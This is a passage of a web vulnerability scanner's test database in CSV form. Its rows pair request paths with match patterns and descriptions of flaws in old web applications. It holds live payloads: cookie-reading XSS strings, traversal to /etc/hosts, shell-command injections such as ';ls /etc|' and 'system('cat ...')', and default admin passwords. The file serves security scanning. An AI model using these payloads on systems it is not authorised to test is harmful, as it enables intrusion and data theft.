(XSS).\",\"\",\"\"\n\"000909\",\"CVE-2003-1536\",\"4\",\"/calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\);<\\/script>\",\"DCP-Portal v5.3.1 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000910\",\"CVE-2002-1732\",\"4\",\"/ca000007.pl?ACTION=SHOWCART&REFPAGE=\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000911\",\"CVE-2002-1732\",\"4\",\"/ca000001.pl?ACTION=SHOWCART&hop=\\\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000912\",\"CVE-2002-1732\",\"4\",\"/bb000001.pl<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000913\",\"CVE-2002-2178\",\"4\",\"/article.php?sid=\\\"><Img%20Src=javascript:alert('Vulnerable')><Img%20Src=\\\"\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"phpWebSite 0.8.3 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000914\",\"\",\"4\",\"/article.cfm?id=1'<script>alert(document.cookie);</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\);<\\/script>\",\"With malformed URLs, ColdFusion is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000915\",\"https://www.mail-archive.com/bugtraq@securityfocus.com/msg11627.html\",\"4\",\"/apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Zeus 4.2r2 (webadmin-4.2r2) is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000916\",\"\",\"4\",\"/anthill/login.php\",\"GET\",\"CODE:200\",\"Anthill bug tracking system may be installed. Versions lower than 0.1.6.1 allow XSS and may allow users to bypass login requirements.\",\"\",\"\"\n\"000917\",\"\",\"4\",\"/admin/login.php?path=\\\"></form><form%20name=a><input%20name=i%20value=XSS>&lt;script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"mcNews 1.1a from phpforums.net is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000918\",\"CVE-2003-0504\",\"4\",\"/addressbook/index.php?surname=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000919\",\"CVE-2003-0504\",\"4\",\"/addressbook/index.php?name=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000920\",\"https://seclists.org/vuln-dev/2002/Apr/270\",\"4\",\"/add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Admanager 1.1 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000921\",\"\",\"4\",\"/a?<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Server is vulnerable to Cross Site Scripting (XSS) in the error message if code is passed in the query-string. This may be a Null HTTPd server.\",\"\",\"\"\n\"000922\",\"\",\"4\",\"/a.jsp/<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ.\",\"\",\"\"\n\"000923\",\"CVE-2003-1243\",\"4\",\"/?mod=<script>alert(document.cookie)</script>&op=browse\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)\",\"Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000924\",\"\",\"4\",\"/<script>alert('Vulnerable')</script>.thtml\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\\.thtml\",\"Server is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000925\",\"\",\"4\",\"/<script>alert('Vulnerable')</script>.shtml\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\\.shtml\",\"Server is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000926\",\"\",\"4\",\"/<script>alert('Vulnerable')</script>.jsp\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\\.jsp\",\"Server is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000927\",\"\",\"4\",\"/<script>alert('Vulnerable')</script>.aspx\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net).\",\"\",\"\"\n\"000928\",\"CVE-2003-1347\",\"4\",\"//profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"GeekLog 1.3.7 allows Cross Site Scripting (XSS).\",\"\",\"\"\n\"000929\",\"CVE-2003-1347\",\"4\",\"//comment.php?mode=Delete&sid=1&cid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"GeekLog 1.3.7 allows Cross Site Scripting (XSS).\",\"\",\"\"\n\"000930\",\"\",\"4\",\"/&lt;script&gt;alert('Vulnerable');&lt;/script&gt;\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Server is vulnerable to Cross Site Scripting (XSS) with HTML-encoded requests.\",\"\",\"\"\n\"000931\",\"\",\"4\",\"/%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Server allows Cross Site Scripting (XSS) in 404 error messages if the code is in a directory. This may be Falcon web server.\",\"\",\"\"\n\"000932\",\"\",\"4\",\"/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server.\",\"\",\"\"\n\"000933\",\"\",\"4\",\"/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server.\",\"\",\"\"\n\"000934\",\"\",\"4\",\"/%22%3cscript%3ealert(%22xss%22)%3c/script%3e\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server.\",\"\",\"\"\n\"000935\",\"CVE-2002-1533\",\"4\",\"/%0a%0a<script>alert(\\\"Vulnerable\\\")</script>.jsp\",\"GET\",\"BODY:<script>alert\\(\\\"Vulnerable\\\"\\)<\\/script>\",\"Jetty JSP servlet engine is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000936\",\"CVE-2002-2115\",\"4\",\"@CGIDIRStitle.cgi\",\"GET\",\"CODE:200\",\"HNS's title.cgi is vulnerable to Cross Site Scripting (XSS CA-2000-02) in version 2.00 and earlier, and Lite 0.8 and earlier.\",\"\",\"\"\n\"000937\",\"CVE-2002-1680\",\"34\",\"@CGIDIRScompatible.cgi\",\"GET\",\"CODE:200\",\"This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000938\",\"\",\"34\",\"/add_user.php\",\"GET\",\"BODY:output started at \\/\",\"DCP-Portal reveals system path. Upgrade to a version higher than 4.2. This version is also vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000939\",\"\",\"1\",\"@CGIDIRSprobecontrol.cgi?command=enable&username=cancer&password=killer\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from a scanner.\",\"\",\"\"\n\"000940\",\"CVE-2002-0226\",\"1\",\"@CGIDIRSretrieve_password.pl\",\"GET\",\"CODE:200\",\"retrieve_password.pl in DCForum 6.x and 2000 generates predictable new passwords based on a sessionID.\",\"\",\"\"\n\"000941\",\"\",\"1e\",\"@CGIDIRSwwwadmin.pl\",\"GET\",\"CODE:200\",\"Administration CGI?\",\"\",\"\"\n\"000942\",\"\",\"1\",\"/cfdocs/expeval/displayopenedfile.cfm\",\"GET\",\"CODE:200&&BODY:not found\",\"Unknown vuln\",\"\",\"\"\n\"000943\",\"\",\"1\",\"/cfdocs/expeval/sendmail.cfm\",\"GET\",\"CODE:200\",\"Can be used to send email; go to the page and fill in the form\",\"\",\"\"\n\"000944\",\"CVE-1999-1550\",\"1ab\",\"/cgi-bin/bigconf.cgi\",\"GET\",\"CODE:200\",\"BigIP Configuration CGI\",\"\",\"\"\n\"000945\",\"\",\"1b\",\"@CGIDIRSwebmap.cgi\",\"GET\",\"CODE:200\",\"nmap front end... could be fun\",\"\",\"\"\n\"000946\",\"\",\"1b\",\"@CGIDIRSwwwwais\",\"GET\",\"BODY:UNISYS WEB SEARCH ENGINE\",\"Unisys web server wais search found.\",\"\",\"\"\n\"000947\",\"\",\"1b\",\"/ammerum/\",\"GET\",\"CODE:200\",\"Ammerum pre 0.6-1 had several security issues.\",\"\",\"\"\n\"000948\",\"\",\"1b\",\"/ariadne/\",\"GET\",\"CODE:200\",\"Ariadne pre 2.1.2 has several vulnerabilities. The default login/pass to the admin page is admin/muze.\",\"\",\"\"\n\"000949\",\"\",\"1b\",\"/cbms/cbmsfoot.php\",\"GET\",\"CODE:200\",\"CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/\",\"\",\"\"\n\"000950\",\"\",\"1b\",\"/cbms/changepass.php\",\"GET\",\"CODE:200\",\"CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/\",\"\",\"\"\n\"000951\",\"\",\"1b\",\"/cbms/editclient.php\",\"GET\",\"CODE:200\",\"CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/\",\"\",\"\"\n\"000952\",\"\",\"1b\",\"/cbms/passgen.php\",\"GET\",\"CODE:200\",\"CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/\",\"\",\"\"\n\"000953\",\"\",\"1b\",\"/cbms/realinv.php\",\"GET\",\"CODE:200\",\"CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/\",\"\",\"\"\n\"000954\",\"\",\"1b\",\"/cbms/usersetup.php\",\"GET\",\"CODE:200\",\"CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/\",\"\",\"\"\n\"000955\",\"\",\"1be\",\"@CGIDIRSadmin/admin.cgi\",\"GET\",\"CODE:200\",\"May be ImageFolio Pro administration CGI. Default login is Admin/ImageFolio.\",\"\",\"\"\n\"000956\",\"\",\"1be\",\"@CGIDIRSadmin/setup.cgi\",\"GET\",\"CODE:200\",\"May be ImageFolio Pro setup CGI. Default login is Admin/ImageFolio.\",\"\",\"\"\n\"000957\",\"\",\"2\",\"@CGIDIRSmt-static/mt-load.cgi\",\"GET\",\"CODE:200\",\"Movable Type weblog installation CGI found. May be able to reconfigure or reload.\",\"\",\"\"\n\"000958\",\"\",\"2\",\"@CGIDIRSmt-static/mt.cfg\",\"GET\",\"BODY:configuration file\",\"Movable Type configuration file found. Should not be available remotely.\",\"\",\"\"\n\"000959\",\"\",\"2\",\"@CGIDIRSmt/mt-load.cgi\",\"GET\",\"CODE:200\",\"Movable Type weblog installation CGI found. May be able to reconfigure or reload.\",\"\",\"\"\n\"000960\",\"\",\"2\",\"@CGIDIRSmt/mt.cfg\",\"GET\",\"BODY:configuration file\",\"Movable Type configuration file found. Should not be available remotely.\",\"\",\"\"\n\"000961\",\"CVE-2000-1205,CVE-2007-4049\",\"2\",\"/cgi-bin-sdb/printenv\",\"GET\",\"BODY:\\/usr\\/bin\\/perl\",\"SuSe is configured with a link from cgi-bin-sdb to cgi-bin. Change the accompanying 'Alias' to 'ScriptAlias' in httpd.conf.\",\"\",\"\"\n\"000962\",\"CVE-2005-0595\",\"12\",\"/ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C\",\"GET\",\"CODE:200\",\"This check (A) sets up the next BadBlue test (B) for possible exploit.\",\"\",\"\"\n\"000963\",\"\",\"23\",\"/db/users.dat\",\"GET\",\"CODE:200\",\"upb PB allows the user database to be retrieved remotely.\",\"\",\"\"\n\"000964\",\"\",\"3\",\"@CGIDIRScgiwrap/~@USERS\",\"GET\",\"BODY:UID of script userid\",\"cgiwrap can be used to enumerate user accounts. Recompile cgiwrap with the '--with-quiet-errors' option to stop user enumeration.\",\"\",\"\"\n\"000965\",\"\",\"3\",\"@CGIDIRScgiwrap/~@JUNK(5)\",\"GET\",\"BODY:unable to find the user\",\"Based on error message, cgiwrap can likely be used to find valid user accounts. Recompile cgiwrap with the '--with-quiet-errors' option to stop user enumeration.\",\"\",\"\"\n\"000966\",\"\",\"3\",\"@CGIDIRScgiwrap/~root\",\"GET\",\"BODY:UID of script userid\",\"cgiwrap can be used to enumerate user accounts. Recompile cgiwrap with the '--with-quiet-errors' option to stop user enumeration.\",\"\",\"\"\n\"000967\",\"\",\"3\",\"@CGIDIRSdbman/db.cgi?db=no-db\",\"GET\",\"CODE:200\",\"This CGI allows remote attackers to view system information.\",\"\",\"\"\n\"000968\",\"CVE-2001-0821 https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"23\",\"@CGIDIRSdcshop/auth_data/auth_user_file.txt\",\"GET\",\"CODE:200\",\"The DCShop installation allows credit card numbers to be viewed remotely.\",\"\",\"\"\n\"000969\",\"CVE-2001-0821 https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"23\",\"/dcshop/auth_data/auth_user_file.txt\",\"GET\",\"CODE:200\",\"The DCShop installation allows credit card numbers to be viewed remotely.\",\"\",\"\"\n\"000970\",\"CVE-2001-0821 https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"23\",\"/dcshop/orders/orders.txt\",\"GET\",\"CODE:200\",\"The DCShop installation allows credit card numbers to be viewed remotely.\",\"\",\"\"\n\"000971\",\"CVE-2001-0821 https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"23\",\"@CGIDIRSdcshop/orders/orders.txt\",\"GET\",\"CODE:200\",\"The DCShop installation allows credit card numbers to be viewed remotely.\",\"\",\"\"\n\"000972\",\"\",\"3\",\"@CGIDIRSdumpenv.pl\",\"GET\",\"CODE:200\",\"This CGI gives a lot of information to attackers.\",\"\",\"\"\n\"000973\",\"CVE-2000-0208\",\"3\",\"@CGIDIRShtsearch?-c/nonexistent\",\"GET\",\"BODY:Unable to read configuration file '\\/nonexistent'\",\"The ht::/Dig install may let an attacker force ht://Dig to read arbitrary config files for itself.\",\"\",\"\"\n\"000974\",\"\",\"3\",\"@CGIDIRSmkilog.exe\",\"GET\",\"CODE:200\",\"This CGI can give an attacker a lot of information.\",\"\",\"\"\n\"000975\",\"\",\"3\",\"@CGIDIRSmkplog.exe\",\"GET\",\"CODE:200\",\"This CGI can give an attacker a lot of information.\",\"\",\"\"\n\"000977\",\"\",\"3\",\"@CGIDIRSprocessit.pl\",\"GET\",\"CODE:200\",\"This CGI returns environment variables, giving attackers valuable information.\",\"\",\"\"\n\"000978\",\"\",\"3\",\"@CGIDIRSrpm_query\",\"GET\",\"CODE:200\",\"This CGI allows anyone to see the installed RPMs\",\"\",\"\"\n\"000979\",\"\",\"3\",\"@CGIDIRSsawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3\",\"GET\",\"BODY:Unknown configuration\",\"The Sawmill CGI allows attackers to read the Sawmill password.\",\"\",\"\"\n\"000981\",\"CVE-2001-0821\",\"3\",\"@CGIDIRSshop/orders/orders.txt\",\"GET\",\"CODE:200\",\"The DCShop installation allows credit card numbers to be viewed remotely.\",\"\",\"\"\n\"000982\",\"\",\"3\",\"@CGIDIRSws_ftp.ini\",\"GET\",\"CODE:200\",\"Can contain saved passwords for ftp sites\",\"\",\"\"\n\"000983\",\"\",\"3\",\"@CGIDIRSWS_FTP.ini\",\"GET\",\"CODE:200\",\"Can contain saved passwords for ftp sites\",\"\",\"\"\n\"000984\",\"CVE-2002-2032\",\"3\",\"/?sql_debug=1\",\"GET\",\"BODY:SQL query:\",\"The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string.\",\"\",\"\"\n\"000985\",\"\",\"3\",\"/a_security.htm\",\"GET\",\"BODY:name=\\\"viewingpasswrd\\\" value=\",\"Polycom ViewStation FX Release v4.2 reveals the admin password in the change password form's HTML.\",\"\",\"\"\n\"000986\",\"https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"3\",\"/Admin_files/order.log\",\"GET\",\"CODE:200\",\"Selena Sol's WebStore 1.0 exposes order information.\",\"\",\"\"\n\"000987\",\"CVE-2002-2143\",\"3e\",\"/admin.html\",\"GET\",\"BODY:MySimpleNews \\- Administration\",\"MySimpleNews contains the admin password in the login page HTML.\",\"\",\"\"\n\"000988\",\"http://www.mybboard.com\",\"3\",\"/admin/cplogfile.log\",\"GET\",\"CODE:200\",\"DevBB 1.0 final log file is readable remotely. Upgrade to the latest version.\",\"\",\"\"\n\"000989\",\"\",\"3\",\"/admin/system_footer.php\",\"GET\",\"CODE:200\",\"myphpnuke version 1.8.8_final_7 reveals detailed system information.\",\"\",\"\"\n\"000990\",\"\",\"3\",\"/cfdocs/snippets/fileexists.cfm\",\"GET\",\"CODE:200\",\"Can be used to verify the existence of files (on the same drive info as the web tree/file)\",\"\",\"\"\n\"000991\",\"\",\"3\",\"/cgi-bin/MachineInfo\",\"GET\",\"CODE:200\",\"Gives out information on the machine.\",\"\",\"\"\n\"000992\",\"CVE‑2003‑1540\",\"3\",\"/chat/!nicks.txt\",\"GET\",\"CODE:200\",\"WF-Chat 1.0 Beta allows retrieval of user information.\",\"\",\"\"\n\"000993\",\"CVE‑2003‑1540\",\"3\",\"/chat/!pwds.txt\",\"GET\",\"CODE:200\",\"WF-Chat 1.0 Beta allows retrieval of user information.\",\"\",\"\"\n\"000994\",\"\",\"3\",\"/chat/data/usr\",\"GET\",\"CODE:200\",\"SimpleChat! 1.3 allows retrieval of user information.\",\"\",\"\"\n\"000995\",\"\",\"3\",\"/com\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Java class files may be browsable.\",\"\",\"\"\n\"000996\",\"\",\"3\",\"/COM\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Java class files may be browsable.\",\"\",\"\"\n\"000997\",\"\",\"3\",\"/config.php\",\"GET\",\"CODE:200\",\"PHP Config file may contain database IDs and passwords.\",\"\",\"\"\n\"000998\",\"\",\"3\",\"/config/\",\"GET\",\"CODE:200\",\"Configuration information may be available remotely.\",\"\",\"\"\n\"000999\",\"https://securitytracker.com/id/1004318,http://www.xmbforum.com\",\"3\",\"/cplogfile.log\",\"GET\",\"CODE:200\",\"XMB Magic Lantern forum 1.6b final log file is readable remotely. Upgrade to the latest version.\",\"\",\"\"\n\"001000\",\"https://seclists.org/fulldisclosure/2003/Dec/15\",\"3\",\"/cutenews/index.php?debug\",\"GET\",\"BODY:PHP Version\",\"Cutenews 1.3 contains an information disclosure bug that reveals standard 'phpinfo' page output.\",\"\",\"\"\n\"001001\",\"\",\"3\",\"/examples/jsp/snp/anything.snp\",\"GET\",\"CODE:200\",\"Tomcat servlet gives lots of host information.\",\"\",\"\"\n\"001002\",\"\",\"3\",\"/file-that-is-not-real-2002.php3\",\"GET\",\"BODY:Unable to open\",\"PHP is configured to show the web root when sending error messages. Set display_errors to 'off'.\",\"\",\"\"\n\"001003\",\"\",\"3\",\"/index.php?sql_debug=1\",\"GET\",\"BODY:SQL query:\",\"The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string.\",\"\",\"\"\n\"001004\",\"\",\"37\",\"@CGIDIRSview-source?view-source\",\"GET\",\"CODE:200\",\"This allows remote users to view source code.\",\"\",\"\"\n\"001005\",\"\",\"37\",\"@CGIDIRSwebplus?about\",\"GET\",\"BODY:Product Information\",\"Webplus may divulge product information, including version numbers. Version 4.X and below have a file read vulnerability.\",\"\",\"\"\n\"001006\",\"\",\"37\",\"/cfdocs/snippets/viewexample.cfm\",\"GET\",\"CODE:200&&BODY:not found\",\"This can be used to view .cfm files, request viewexample.cfm?Tagname=..\\..\\..\\file (.cfm is assumed)\",\"\",\"\"\n\"001007\",\"\",\"3a\",\"/chassis/config/GeneralChassisConfig.html\",\"GET\",\"BODY:Chassis Configuration\",\"The Cabletron switch may allow remote configuration, or data retrieval, through the web interface.\",\"\",\"\"\n\"001008\",\"CVE-2001-0839\",\"3b\",\"@CGIDIRSibill.pm\",\"GET\",\"CODE:200\",\"iBill.pm is installed. This may allow brute forcing of passwords.\",\"\",\"\"\n\"001009\",\"CVE-2002-0311\",\"3b\",\"@CGIDIRSscoadminreg.cgi\",\"GET\",\"CODE:200\",\"This script (part of UnixWare WebTop) may have a local root exploit. It is also an system admin script and should be protected via the web.\",\"\",\"\"\n\"001010\",\"\",\"3b\",\"@CGIDIRSSGB_DIR/superguestconfig\",\"GET\",\"CODE:200\",\"Super GuestBook 1.0 from lasource.r2.ru stores the admin password in a plain text file.\",\"\",\"\"\n\"001011\",\"\",\"4\",\"/hp/device/this.LCDispatcher\",\"GET\",\"BODY:Printer Serial Number\",\"The Hewlett Packard Color LaserJet 4550 may allow unauthenticated users to permanently include links (and other data) in the web interface.\",\"\",\"\"\n\"001012\",\"\",\"6\",\"/cfdocs/snippets/evaluate.cfm\",\"GET\",\"CODE:200\",\"This allows you to enter Coldfusion code to be evaluated, or potentially create denial of service.\",\"\",\"\"\n\"001013\",\"\",\"6\",\"/cfide/Administrator/startstop.html\",\"GET\",\"CODE:200\",\"Can start/stop the Coldfusion server\",\"\",\"\"\n\"001014\",\"\",\"7\",\"@CGIDIRSicat\",\"GET\",\"CODE:200\",\"Multiple versions of icat allow attackers to read arbitrary files. Make sure the latest version is running.\",\"\",\"\"\n\"001015\",\"CVE-2002-1528\",\"7\",\"@CGIDIRSMsmMask.exe?mask=/@JUNK(10)\",\"GET\",\"BODY:(Failed to read the maskfile|MondoSearch for Web Sites)\",\"MondoSearch may allow any file to be retrieved using the 'mask' variable.\",\"\",\"\"\n\"001020\",\"\",\"7\",\"@CGIDIRSnph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0\",\"GET\",\"CODE:200\",\"nCUBE Server Manager 1.0 nph-showlogs.pl directory traversal bug\",\"\",\"\"\n\"001021\",\"\",\"7\",\"@CGIDIRSquery?mss=%2e%2e/config\",\"GET\",\"BODY:MGMT_PW\",\"The Altavista search service allows attackers to read any file on the server.\",\"\",\"\"\n\"001022\",\"\",\"7\",\"@CGIDIRStest-cgi?/*\",\"GET\",\"BODY:\\/tmp\",\"This CGI allows files to read remotely.\",\"\",\"\"\n\"001023\",\"CVE-2002-1411\",\"7\",\"@CGIDIRSupdate.dpgs\",\"GET\",\"CODE:200\",\"Duma Photo Gallery System may allow remote users to write to any file on the system. This could not be remotely tested.\",\"\",\"\"\n\"001024\",\"\",\"7\",\"@CGIDIRSview-source\",\"GET\",\"CODE:200\",\"This may allow remote arbitrary file retrieval.\",\"\",\"\"\n\"001025\",\"\",\"7\",\"@CGIDIRSwrap\",\"GET\",\"CODE:200\",\"This CGI lets users read any file with 755 perms. It should not be in the CGI directory.\",\"\",\"\"\n\"001026\",\"\",\"7\",\"/Mem/dynaform/FileExplorer.htm\",\"GET\",\"BODY:File Explorer\",\"The Nortel MIRAN device allows unauthenticated users to view the contents of the system's drive.\",\"\",\"\"\n\"001027\",\"\",\"78\",\"@CGIDIRSFormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fhosts&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com\",\"GET\",\"@LFI()\",\"This CGI allows attackers to read files and execute commands remotely.\",\"\",\"\"\n\"001028\",\"\",\"78\",\"@CGIDIRSlastlines.cgi?process\",\"POST\",\"@LFI()\",\"This CGI lets attackers read arbitrary files and/or execute commands.\",\"num_lines=1000&log_location=..%2F..%2F..%2F..%2F..%2Fetc%2Fhosts\",\"\"\n\"001029\",\"CVE-2000-0432\",\"8\",\"@CGIDIRScalendar_admin.pl?config=|cat%20@LFI(nix,abs)|\",\"GET\",\"@LFI()\",\"This CGI allows attackers to execute commands on the server.\",\"\",\"\"\n\"001030\",\"CVE-2000-0432\",\"8\",\"@CGIDIRScalendar/calendar_admin.pl?config=|cat%20@LFI(nix,abs)|\",\"GET\",\"@LFI()\",\"This CGI allows attackers to execute commands on the server.\",\"\",\"\"\n\"001031\",\"CVE-1999-0146\",\"8\",\"@CGIDIRScampas?%0acat%0a@LFI(nix,abs)%0a\",\"GET\",\"CODE:200&&@LFI()\",\"NCSA campas allows attackers to execute commands on the server.\",\"\",\"\"\n\"001032\",\"CVE‑2002‑1652\",\"8\",\"@CGIDIRScgicso?query=AAA\",\"GET\",\"BODY:400 Required field missing: fingerhost\",\"CGIEmail's cgicso allows attackers to execute remote commands.\",\"\",\"\"\n\"001033\",\"\",\"8\",\"@CGIDIRScgiwrap\",\"GET\",\"CODE:200\",\"Some versions of cgiwrap allow anyone to execute commands remotely.\",\"\",\"\"\n\"001034\",\"CVE-2001-0997\",\"8\",\"@CGIDIRScommon/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|\",\"GET\",\"BODY:resolv\\.conf\",\"Allows attacker to execute commands as http daemon. Upgrade or remove.\",\"\",\"\"\n\"001035\",\"\",\"8\",\"@CGIDIRSCount.cgi\",\"GET\",\"CODE:200\",\"This may allow attackers to execute arbitrary commands on the server\",\"\",\"\"\n\"001036\",\"https://lwn.net/2002/0411/a/cgiscript.php3\",\"8\",\"@CGIDIRScsChatRBox.cgi?command=savesetup&setup=;system('cat%20@LFI(nix,abs)')\",\"GET\",\"@LFI()\",\"Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version.\",\"\",\"\"\n\"001037\",\"https://lwn.net/2002/0411/a/cgiscript.php3\",\"8\",\"@CGIDIRScsGuestBook.cgi?command=savesetup&setup=;system('cat%20@LFI(nix,abs)')\",\"GET\",\"@LFI()\",\"Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version.\",\"\",\"\"\n\"001038\",\"https://lwn.net/2002/0411/a/cgiscript.php3\",\"8\",\"@CGIDIRScsLiveSupport.cgi?command=savesetup&setup=;system('cat%20@LFI(nix,abs)')\",\"GET\",\"@LFI()\",\"Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version.\",\"\",\"\"\n\"001039\",\"https://lwn.net/2002/0411/a/cgiscript.php3\",\"8\",\"@CGIDIRScsNewsPro.cgi?command=savesetup&setup=;system('cat%20@LFI(nix,abs)')\",\"GET\",\"@LFI()\",\"Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version.\",\"\",\"\"\n\"001040\",\"\",\"8\",\"@CGIDIRSecho.bat\",\"GET\",\"CODE:200\",\"This CGI may allow attackers to execute remote commands.\",\"\",\"\"\n\"001041\",\"\",\"8\",\"@CGIDIRSformmail.cgi?recipient=root@localhost%0Acat%20@LFI(nix,abs)&email=joeuser@localhost&subject=test\",\"GET\",\"@LFI()\",\"This CGI allows attackers to retrieve arbitrary files from the server.\",\"\",\"\"\n\"001042\",\"https://www.exploit-db.com/exploits/22743\",\"8\",\"@CGIDIRSImageFolio/admin/admin.cgi\",\"GET\",\"CODE:200\",\"ImageFolio (default account Admin/ImageFolio) may allow files to be deleted via URLs like: ?cgi=remove.pl&uid=111.111.111.111&rmstep=2&category=../../../../../../../../../../../etc/\",\"\",\"\"\n\"001043\",\"CVE-1999-0266\",\"8\",\"@CGIDIRSinfo2www%20'(../../../../../../../bin/mail%20root%20<@LFI(nix,abs)>\",\"GET\",\"@LFI()\",\"This CGI allows attackers to execute commands. The file may have been mailed to root.\",\"\",\"\"\n\"001044\",\"\",\"8\",\"@CGIDIRSinfo2www\",\"GET\",\"CODE:200\",\"This CGI allows attackers to execute commands.\",\"\",\"\"\n\"001045\",\"\",\"8\",\"@CGIDIRSinfosrch.cgi\",\"GET\",\"CODE:200\",\"This CGI allows attackers to execute 